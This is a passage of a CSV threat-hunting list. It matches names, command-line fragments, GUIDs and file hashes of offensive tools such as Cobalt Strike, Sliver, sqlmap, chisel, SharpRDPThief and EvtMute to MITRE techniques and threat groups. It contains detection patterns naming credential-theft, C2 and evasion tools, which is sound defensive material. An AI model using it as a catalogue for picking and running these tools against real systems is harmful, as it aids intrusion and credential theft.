security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*BastilleResearch*",".{0,1000}BastilleResearch.{0,1000}","offensive_tool_keyword","Github Username","Open source testing tools for the SDR & security community","T1179 - T1141 - T1142 - T1143","TA0011 - ","N/A","N/A","Exploitation tools","https://github.com/BastilleResearch","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--batch --dump -T *",".{0,1000}\-\-batch\s\-\-dump\s\-T\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*Bates.exe --kill*",".{0,1000}Bates\.exe\s\-\-kill.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*Bates.exe --listen*",".{0,1000}Bates\.exe\s\-\-listen.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation 
tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*bats3c/ADCSPwn*",".{0,1000}bats3c\/ADCSPwn.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authentication from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","796","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*bats3c/darkarmour*",".{0,1000}bats3c\/darkarmour.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memory without a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","690","117","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*bats3c/DarkLoadLibrary*",".{0,1000}bats3c\/DarkLoadLibrary.{0,1000}","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","10","990","199","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" "*bats3c/EvtMute*",".{0,1000}bats3c\/EvtMute.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*bawait_upload*",".{0,1000}bawait_upload.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. 
CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*bawait_upload_raw*",".{0,1000}bawait_upload_raw.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*bb141fb92bcd492552d5d6c09fbf39f7f674eb49*",".{0,1000}bb141fb92bcd492552d5d6c09fbf39f7f674eb49.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*bb205ccc783d22b06eac7ab9e5f2f14d793bf9b4ed6fe413f888463092ccf79a*",".{0,1000}bb205ccc783d22b06eac7ab9e5f2f14d793bf9b4ed6fe413f888463092ccf79a.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*bb33277d1d07b2dc6438e1a95eb4446d1c7a975ec0e70bb8f4b09fe1160205cd*",".{0,1000}bb33277d1d07b2dc6438e1a95eb4446d1c7a975ec0e70bb8f4b09fe1160205cd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*bb3b1a1f-0447-42a6-955a-88681fb88499*",".{0,1000}bb3b1a1f\-0447\-42a6\-955a\-88681fb88499.{0,1000}","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","32","9","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" "*bb62a3336da75791e241e3e757318dd0af03c1c678a249c3b67f16ef75ce648e*",".{0,1000}bb62a3336da75791e241e3e757318dd0af03c1c678a249c3b67f16ef75ce648e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bb695f5c847a67e8d0b6918a474b0f93090c8c5d64bf5b160b9f0c0fd4352bf5*",".{0,1000}bb695f5c847a67e8d0b6918a474b0f93090c8c5d64bf5b160b9f0c0fd4352bf5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bb774a70665afeafeda776cc7b37f59f29fc3b16124e94020a91d4fdfa3f260b*",".{0,1000}bb774a70665afeafeda776cc7b37f59f29fc3b16124e94020a91d4fdfa3f260b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*BB8A69C4-18B0-4FF2-989C-F70778FFBCE6*",".{0,1000}BB8A69C4\-18B0\-4FF2\-989C\-F70778FFBCE6.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*bb8a907ebbe611f271b35d461b15ccb8e90e36567e9963ea9a64ba4fe3d7d1bc*",".{0,1000}bb8a907ebbe611f271b35d461b15ccb8e90e36567e9963ea9a64ba4fe3d7d1bc.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*bb94dc4cb2b8a99594a2199912c675406ae64d5e30141c4f3aa9109053a2790d*",".{0,1000}bb94dc4cb2b8a99594a2199912c675406ae64d5e30141c4f3aa9109053a2790d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*bb95177747c3f54ff72dbcd2942c2278ee7567a1202c6d5c3183faeb78cf673c*",".{0,1000}bb95177747c3f54ff72dbcd2942c2278ee7567a1202c6d5c3183faeb78cf673c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*bba2c964972ac62ae9f9a2e0ee0046fa046dff0cd53183ca2169e1659c234e98*",".{0,1000}bba2c964972ac62ae9f9a2e0ee0046fa046dff0cd53183ca2169e1659c234e98.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used 
by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*bbb23c2b1443945e653b67353906939549ffac7dcdcf4bfd6a6c2f67a6320d13*",".{0,1000}bbb23c2b1443945e653b67353906939549ffac7dcdcf4bfd6a6c2f67a6320d13.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*BBCD0202-C086-437C-A606-015456F90C46*",".{0,1000}BBCD0202\-C086\-437C\-A606\-015456F90C46.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*bbfe2aee2092d981bd2822b8fde8db0ed264f0f86ed445d8987d99b505fd0ff5*",".{0,1000}bbfe2aee2092d981bd2822b8fde8db0ed264f0f86ed445d8987d99b505fd0ff5.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*bblockdlls*",".{0,1000}bblockdlls.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bbrowserpivot*",".{0,1000}bbrowserpivot.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bbrowserpivot*",".{0,1000}bbrowserpivot.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bbtfr/evil-proxy*",".{0,1000}bbtfr\/evil\-proxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*bbypassuac*",".{0,1000}bbypassuac.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments 
that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bc11b2b14526fef7b745fa22f0359235fab202060716f0c9544e4ef899c7312e*",".{0,1000}bc11b2b14526fef7b745fa22f0359235fab202060716f0c9544e4ef899c7312e.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*bc2ce508993e19027fb23f837dd48da400898cbc83d9adde6febb803e76817ed*",".{0,1000}bc2ce508993e19027fb23f837dd48da400898cbc83d9adde6febb803e76817ed.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*bc3023b36063a7681db24681472b54fa11f0d4ec*",".{0,1000}bc3023b36063a7681db24681472b54fa11f0d4ec.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*bc422a4e1b6a351ac6fe73d496015cfa6a9dbd5e38566c6f44a59faff83ee95a*",".{0,1000}bc422a4e1b6a351ac6fe73d496015cfa6a9dbd5e38566c6f44a59faff83ee95a.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*bc5d95f4894db18e69826a772226989ca19ea7e63dbb9fa13775836a0b25cdb5*",".{0,1000}bc5d95f4894db18e69826a772226989ca19ea7e63dbb9fa13775836a0b25cdb5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*bc7a70c2b56c5e036a0750ab7c93511235161e84f913f538d5e12882b66d965a*",".{0,1000}bc7a70c2b56c5e036a0750ab7c93511235161e84f913f538d5e12882b66d965a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*BCBC884D-2D47-4138-B68F-7D425C9291F9*",".{0,1000}BCBC884D\-2D47\-4138\-B68F\-7D425C9291F9.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*bcc2_setenv*",".{0,1000}bcc2_setenv.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*bcc2_spawn*",".{0,1000}bcc2_spawn.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" 